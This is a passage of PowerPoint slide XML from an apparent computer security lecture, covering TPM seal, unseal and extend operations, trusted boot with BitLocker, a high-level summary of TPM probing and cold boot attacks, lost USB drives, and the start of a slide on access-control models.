          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19429664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Trusted Platform Module (TPM)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8382000" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Crypto processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Mounted on motherboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tamper-resistant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Holds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> K that is never released</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Has several platform configuration registers (PCRs), with fixed value at power up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Operation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Encrypts with K supplied plaintext p and associates it with a PCR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Returns ciphertext c = E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(p) and MAC m = MAC(K,PCR[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Operation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unseal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Input is a ciphertext c, PCR index </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, and claimed MAC m</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Decrypts ciphertext c and returns D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(c) if MAC(K,PCR[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>]) =  m</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Operation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Only operation supported on PCRs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Input is a data item x and PCR index </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Computes step of hash chain: PCR[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>] = h(PCR[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>], x)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6019801" y="1219200"/>
            <a:ext cx="2438400" cy="1219200"/>
            <a:chOff x="5867400" y="1295400"/>
            <a:chExt cx="2886075" cy="1676400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5867400" y="1295400"/>
              <a:ext cx="2886075" cy="1581150"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Text Box 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5915024" y="2590800"/>
              <a:ext cx="2819400" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="6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chemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Image courtesy of sony.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11111613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Booting with a TPM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="7696200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Multi-level integrity checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Allows BitLocker authentication without user intervention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Initialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>PCR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> with layers of trusted OS code (BIOS, boot loader, kernel, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Volume master key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sealed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> to PCR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Trusted boot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tamper-proof BIOS associated with TPM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Each code layer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extends</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> PCR with next layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>If integrity is not verified, PCR is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> with random value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Execution is transferred to next code layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>VMK can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unsealed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> only if the integrity of all layers has been successfully verified</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17608662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Attacks on BitLocker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1219200"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Compromise the TPM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Extraction of data from Infineon TPM recently presented by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Christopher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Tarnovsky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> at Black Hat DC 2010</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0"/>
              <a:t>microprobing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> the substrate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Requires significant sophistication and specialized instruments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>“Lest We Remember: Cold Boot Attacks on Encryption Keys”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>Volume  encryption key is  stored in memory to decrypt the drive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>RAM retains contents after power down</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>for 2-3 seconds normally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>Retention time can be extended for up to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>an hour by cooling the memory chip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>Memory content accessed after booting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>from USB drive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>Key recovered by analyzing memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 3">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5600700" y="3769520"/>
            <a:ext cx="3048000" cy="2028825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="5826920"/>
            <a:ext cx="32766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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Image courtesy of Center for Information Technology Policy, Princeton University</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8254359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Lost USB Drives</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="3733800" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Millions of USB flash drives are in use today worldwide and thousands are lost each day, according to one estimate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Computer security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>does not prevent </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>loss of USB drives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>But we can try to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>avoid information </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>leakage</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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="2097" r="1456"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="1981200"/>
            <a:ext cx="4773038" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194792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Models</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Various models have been developed to formalize mechanisms to protect the confidentiality and integrity of documents stored in a computer system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>The Bell-La Padula (BLP) model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
